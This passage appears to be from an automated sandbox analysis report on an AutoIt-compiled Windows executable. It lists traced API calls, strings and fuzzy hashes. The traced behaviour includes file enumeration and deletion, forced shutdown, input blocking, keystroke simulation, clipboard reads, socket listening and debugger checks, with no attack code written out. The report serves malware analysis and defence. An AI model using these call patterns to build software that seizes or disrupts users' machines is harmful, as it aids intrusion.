                              • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                            • _wcscat.LIBCMT ref: 0044BD94
                            • _wcscat.LIBCMT ref: 0044BDBD
                            • __wsplitpath.LIBCMT ref: 0044BDEA
                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                            • _wcscpy.LIBCMT ref: 0044BE71
                            • _wcscat.LIBCMT ref: 0044BE83
                            • _wcscat.LIBCMT ref: 0044BE95
                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                            • DeleteFileW.KERNEL32(?), ref: 0044BED3
                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                            • DeleteFileW.KERNEL32(?), ref: 0044BF15
                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                            • FindClose.KERNEL32(00000000), ref: 0044BF33
                            • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                            • FindClose.KERNEL32(00000000), ref: 0044BF7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                            • String ID: \*.*
                            • API String ID: 2188072990-1173974218
                            • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                            • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                            • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                            • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                            • FindClose.KERNEL32(00000000), ref: 00478924
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                            • __swprintf.LIBCMT ref: 004789D3
                            • __swprintf.LIBCMT ref: 00478A1D
                            • __swprintf.LIBCMT ref: 00478A4B
                            • __swprintf.LIBCMT ref: 00478A79
                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                            • __swprintf.LIBCMT ref: 00478AA7
                            • __swprintf.LIBCMT ref: 00478AD5
                            • __swprintf.LIBCMT ref: 00478B03
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                            • __wsplitpath.LIBCMT ref: 00403492
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • _wcscpy.LIBCMT ref: 004034A7
                            • _wcscat.LIBCMT ref: 004034BC
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                            • _wcscpy.LIBCMT ref: 004035A0
                            • _wcslen.LIBCMT ref: 00403623
                            • _wcslen.LIBCMT ref: 0040367D
                            Strings
                            • _, xrefs: 0040371C
                            • Unterminated string, xrefs: 00428348
                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                            • Error opening the file, xrefs: 00428231
                            Similarity
                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                            • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                            • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                            • FindClose.KERNEL32(00000000), ref: 00431B20
                            • FindClose.KERNEL32(00000000), ref: 00431B34
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                            • FindClose.KERNEL32(00000000), ref: 00431BCD
                            • FindClose.KERNEL32(00000000), ref: 00431BDB
                            Strings
                            Similarity
                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                            • String ID: *.*
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                            • __swprintf.LIBCMT ref: 00431C2E
                            • _wcslen.LIBCMT ref: 00431C3A
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                            Strings
                            Similarity
                            • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                            • String ID: :$\$\??\%s
                            APIs
                            • GetLocalTime.KERNEL32(?), ref: 004722A2
                            • __swprintf.LIBCMT ref: 004722B9
                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                            Strings
                            Similarity
                            • API ID: FolderPath$LocalTime__swprintf
                            • String ID: %.3d
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                            • FindClose.KERNEL32(00000000), ref: 0044291C
                            • FindClose.KERNEL32(00000000), ref: 00442930
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                            • FindClose.KERNEL32(00000000), ref: 004429D4
                              • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                            • FindClose.KERNEL32(00000000), ref: 004429E2
                            Strings
                            Similarity
                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                            • String ID: *.*
                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                            • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                            • GetLastError.KERNEL32 ref: 00433414
                            • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                            Strings
                            Similarity
                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                            • String ID: SeShutdownPrivilege
                            APIs
                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                              • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                              • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                            • GetLengthSid.ADVAPI32(?), ref: 004461D0
                            • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                            • GetLengthSid.ADVAPI32(?), ref: 00446241
                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                            • CopySid.ADVAPI32(00000000), ref: 00446271
                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                            Similarity
                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                            • String ID:
                            APIs
                            • __swprintf.LIBCMT ref: 00433073
                            • __swprintf.LIBCMT ref: 00433085
                            • __wcsicoll.LIBCMT ref: 00433092
                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                            • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                            • LockResource.KERNEL32(00000000), ref: 004330CA
                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                            • LoadResource.KERNEL32(?,00000000), ref: 00433105
                            • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                            • LockResource.KERNEL32(?), ref: 00433120
                            Similarity
                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                            • String ID:
                            APIs
                            Similarity
                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                            • String ID:
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                            • GetLastError.KERNEL32 ref: 0045D6BF
                            • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                            Strings
                            Similarity
                            • API ID: Error$Mode$DiskFreeLastSpace
                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove$_strncmp
                            • String ID: @oH$\$^$h
                            • API String ID: 2175499884-3701065813
                            APIs
                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                            • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                            • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                            • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                            • listen.WSOCK32(00000000,00000005), ref: 00465381
                            • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                            • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                            Similarity
                            • API ID: ErrorLast$closesocket$bindlistensocket
                            • String ID:
                            • API String ID: 540024437-0
                            Strings
                            Similarity
                            • API ID:
                            • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                            • API String ID: 0-2872873767
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                            • __wsplitpath.LIBCMT ref: 00475644
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • _wcscat.LIBCMT ref: 00475657
                            • __wcsicoll.LIBCMT ref: 0047567B
                            • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                            • CloseHandle.KERNEL32(00000000), ref: 004756BA
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                            • String ID:
                            • API String ID: 2547909840-0
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                            • Sleep.KERNEL32(0000000A), ref: 0045250B
                            • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                            • FindClose.KERNEL32(?), ref: 004525FF
                            Strings
                            Similarity
                            • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                            • String ID: *.*$\VH
                            • API String ID: 2786137511-2657498754
                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                            • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                            • TerminateProcess.KERNEL32(00000000), ref: 00422004
                            Strings
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID: pqI
                            • API String ID: 2579439406-2459173057
                            APIs
                            • __wcsicoll.LIBCMT ref: 00433349
                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                            • __wcsicoll.LIBCMT ref: 00433375
                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                            Strings
                            Similarity
                            • API ID: __wcsicollmouse_event
                            • String ID: DOWN
                            • API String ID: 1033544147-711622031
                            APIs
                            • GetKeyboardState.USER32(?), ref: 0044C3D2
                            • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                            Similarity
                            • API ID: KeyboardMessagePostState$InputSend
                            • String ID:
                            • API String ID: 3031425849-0
                            APIs
                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                            • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                            • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                            Similarity
                            • API ID: ErrorLastinet_addrsocket
                            • String ID:
                            • API String ID: 4170576061-0
                            APIs
                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                            • IsWindowVisible.USER32 ref: 0047A368
                            • IsWindowEnabled.USER32 ref: 0047A378
                            • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                            • IsIconic.USER32 ref: 0047A393
                            • IsZoomed.USER32 ref: 0047A3A1
                            Similarity
                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                            • String ID:
                            • API String ID: 292994002-0
                            APIs
                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                            • CoInitialize.OLE32(00000000), ref: 00478442
                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                            • CoUninitialize.OLE32 ref: 0047863C
                            Strings
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                            • String ID: .lnk
                            • API String ID: 886957087-24824748
                            APIs
                            • OpenClipboard.USER32(?), ref: 0046DCE7
                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                            • CloseClipboard.USER32 ref: 0046DD0D
                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                            • CloseClipboard.USER32 ref: 0046DD41
                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                            • CloseClipboard.USER32 ref: 0046DD99
                            Similarity
                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                            • String ID:
                            • API String ID: 15083398-0
                            APIs
                            Strings
                            Similarity
                            • API ID: _memmove
                            • String ID: U$\
                            • API String ID: 4104443479-100911408
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                            Similarity
                            • API ID: Find$File$CloseFirstNext
                            • String ID:
                            • API String ID: 3541575487-0
                            APIs
                            • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                            • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                            • FindClose.KERNEL32(00000000), ref: 004339EB
                            Similarity
                            • API ID: FileFind$AttributesCloseFirst
                            • String ID:
                            • API String ID: 48322524-0
                            APIs
                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                            Similarity
                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                            • String ID:
                            • API String ID: 901099227-0
                            APIs
                            • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                            Similarity
                            • API ID: Proc
                            • String ID:
                            • API String ID: 2346855178-0
                            APIs
                            • BlockInput.USER32(00000001), ref: 0045A38B
                            Similarity
                            • API ID: BlockInput
                            • String ID:
                            • API String ID: 3456056419-0
                            APIs
                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                            Similarity
                            • API ID: LogonUser
                            • String ID:
                            • API String ID: 1244722697-0
                            APIs
                            • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                            Similarity
                            • API ID: NameUser
                            • String ID:
                            • API String ID: 2645101109-0
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            Strings
                            Similarity
                            • API ID:
                            • String ID: N@
                            • API String ID: 0-1509896676
                            APIs
                            • DeleteObject.GDI32(?), ref: 0045953B
                            • DeleteObject.GDI32(?), ref: 00459551
                            • DestroyWindow.USER32(?), ref: 00459563
                            • GetDesktopWindow.USER32 ref: 00459581
                            • GetWindowRect.USER32(00000000), ref: 00459588
                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                            • GetClientRect.USER32(00000000,?), ref: 004596F8
                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                            • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                            • GlobalLock.KERNEL32(00000000), ref: 0045978F
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                            • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                            • CloseHandle.KERNEL32(00000000), ref: 004597AC
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                            • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                            • GlobalFree.KERNEL32(00000000), ref: 004597E2
                            • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                            • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                            • ShowWindow.USER32(?,00000004), ref: 00459865
                            • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                            • GetStockObject.GDI32(00000011), ref: 004598CD
                            • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                            • DeleteDC.GDI32(00000000), ref: 004598F8
                            • _wcslen.LIBCMT ref: 00459916
                            • _wcscpy.LIBCMT ref: 0045993A
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                            • GetDC.USER32(00000000), ref: 004599FC
                            • SelectObject.GDI32(00000000,?), ref: 00459A0C
                            • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                            • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                            • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                            Strings
                            Similarity
                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                            • String ID: $AutoIt v3$DISPLAY$static
                            • API String ID: 4040870279-2373415609
                            APIs
                            • GetSysColor.USER32(00000012), ref: 0044181E
                            • SetTextColor.GDI32(?,?), ref: 00441826
                            • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                            • GetSysColor.USER32(0000000F), ref: 00441849
                            • SetBkColor.GDI32(?,?), ref: 00441864
                            • SelectObject.GDI32(?,?), ref: 00441874
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                            • GetSysColor.USER32(00000010), ref: 004418B2
                            • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                            • FrameRect.USER32(?,?,00000000), ref: 004418CA
                            • DeleteObject.GDI32(?), ref: 004418D5
                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                            • FillRect.USER32(?,?,?), ref: 00441970
                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                              • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                              • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                              • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                              • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                              • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                              • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                              • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                              • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                              • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                              • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                              • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                            • String ID:
                            • API String ID: 69173610-0
                            • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                            • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                            • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                            • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                            APIs
                            • DestroyWindow.USER32(?), ref: 004590F2
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                            • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                            • GetClientRect.USER32(00000000,?), ref: 0045924E
                            • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                            • GetStockObject.GDI32(00000011), ref: 004592AC
                            • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                            • DeleteDC.GDI32(00000000), ref: 004592D6
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                            • GetStockObject.GDI32(00000011), ref: 004593D3
                            • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                            Similarity
                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                            • API String ID: 2910397461-517079104
                            • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                            • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                            • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                            • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                            APIs
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-3360698832
                            • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                            • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                            • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
